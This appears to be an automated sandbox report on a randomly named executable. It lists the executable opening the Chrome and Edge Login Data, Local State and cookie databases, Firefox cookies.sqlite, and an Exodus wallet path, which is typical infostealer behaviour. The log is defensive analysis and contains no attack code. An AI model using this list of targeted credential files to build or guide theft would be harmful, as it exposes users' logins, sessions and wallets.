Source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: powershell.exe, 00000001.00000002.2444317338.000001BD90075000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
